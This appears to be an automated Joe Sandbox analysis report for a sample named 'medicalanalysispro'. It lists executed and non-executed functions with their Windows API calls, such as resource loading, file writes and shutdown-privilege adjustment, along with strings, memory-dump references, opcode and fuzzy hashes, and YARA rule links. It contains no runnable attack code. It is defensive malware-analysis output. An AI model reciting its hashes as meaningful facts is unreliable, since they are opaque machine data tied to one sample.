                                                                                                                                                                                                                                                                                                              • Instruction ID: 50bdf45ab958d2ffbde3d79ea28f82757b386e1d49c6632ea6288cd921e6ae81
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC512F35A0CA4286E79EAB6DE890375A3A4BF76754FD40431DB4D82298FF3CE841C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE760A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75078
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: SizeofResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75089
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750AF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LoadResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750C0
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LockResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750CF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: memcpy_s.MSVCRT ref: 00007FF7BDE750EE
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FreeResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750FD
                                                                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7BDE73123), ref: 00007FF7BDE760C9
                                                                                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00007FF7BDE76142
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: LoadStringA.USER32 ref: 00007FF7BDE74E60
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: MessageBoxA.USER32 ref: 00007FF7BDE74EA0
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77700: GetLastError.KERNEL32 ref: 00007FF7BDE77704
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                              • String ID: $<None>$UPROMPT
                                                                                                                                                                                                                                                                                                              • API String ID: 957408736-2569542085
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                              • Instruction ID: ad0386adbcfd9505e625118e373b0b77e0854b3718309587007fcb6ff9051fa9
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E318671A0C242C7F798BB28E954779FA61EFA6748F805134CB4D06699FF7DD0048720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateFile$lstrcmp
                                                                                                                                                                                                                                                                                                              • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                              • API String ID: 1301100335-3211172518
                                                                                                                                                                                                                                                                                                              • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                              • Instruction ID: dc8a7683782a03436d5055e9d7ab2b842ffca75ce44420adae5b9e23f490b954
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8261A662A0C74186F7A89B19A480379BE91EB66B64F845335CB7E027D8EF7CE4458720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE758B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                              • API String ID: 851750970-305352358
                                                                                                                                                                                                                                                                                                              • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0ae5f26fcc3773f47cd04bfcd7d043651466c4ecc5115b31c38ba1dfb7834449
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49518431A1CA4282FBD8AB19D4401B9ABA0FB6AB50FC45535DB6E432DDEF3CE541C360
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE76B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                              • String ID: TMP4351$.TMP
                                                                                                                                                                                                                                                                                                              • API String ID: 3494564517-2619824408
                                                                                                                                                                                                                                                                                                              • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                                                                                                                                                                                                              • Instruction ID: d02bae267ee7ea6f20fe1e2535e49907e035b0b899c62201852fe3026e2f7a02
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74315231A0C68187F798AB29A8103BAF650EB97BA9F845334DB6E077D9DF3CD4058710
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE73B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7BDE73A09), ref: 00007FF7BDE73B64
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE73B40: PeekMessageA.USER32 ref: 00007FF7BDE73B89
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE73B40: PeekMessageA.USER32 ref: 00007FF7BDE73BCD
                                                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE ref: 00007FF7BDE756E4
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                              • Instruction ID: e13d382cc0d93c5977ae90210c7761ed92b3ed40d727ff15d1af60648f2fe546
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0218020A0C542C6E798AF19E844775FB61FFA6794FD48234DB2D066A8EF3CE405CB20
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE751BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2018477427-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4b155ea387330d18f4baa26c2bd4b092603ceb347107d1f68360a517b1d58a19
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A11913190C682C2F6D87B58A544379AAA0FB67748F984131CB6C026ACEF7DE8458310
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE77BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                                                                                                                                              • Instruction ID: b7045ad66317991a72f3f907aa096796075779c0d131f4d85f2145362f273f82
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA012621A0C7C186F3857F19B840369FA90A75BBE4F989270DB69177C9DF2CD842C710
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE75770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                                                                                                                                              • Instruction ID: 28b06a25656cd8acbde7586312b731f183ebef411c12262c6bed9a6fa47c88dd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F03631A0C7C1D2DB5C5F29F581178B664EB59B58F544235DB2B4B6C8DF78D481CB20

                                                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                                                                              • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$ham
                                                                                                                                                                                                                                                                                                              • API String ID: 3530494346-1652725673
                                                                                                                                                                                                                                                                                                              • Opcode ID: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                                                                                                                                                                                                                                                                                              • Instruction ID: ec12c8a027b6edb717c7770abe6cf8455afadafca200860b5a15e7c0d8a68443
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D717565B0CA4286F7D8AB59A84427AFA51FFA7B94FD44130CB5D0269DEF3CE4058730
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE712EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                              • Instruction ID: b57a81b34962598803ed857251222f61f463e77004f8013909c1e8a7f06b3fcc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97514E32608B41CAE764AF25E8441A9BBB4FB5EB88F825135EB4E5375CEF38D444CB10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE71C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                              • API String ID: 2829607268-3733053543
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                              • Instruction ID: f51029e7c69304ca35934930634930a66d426518652c91236aef04ef77e56a9c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C021B172A1C64287E7989F68F45577AFB60FBAA745F80A135E74E02A58EF3CD044CB10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE78964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                              • Instruction ID: 09ed0e6b596240f379a7c9bfdc7c0aeea3108fd00fed714dda20d7629a5a4944
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91112F35B08B4186DB44AF65E84416873B4FB1A758B800A30EB5D47758FF7CD1648350
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE78790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
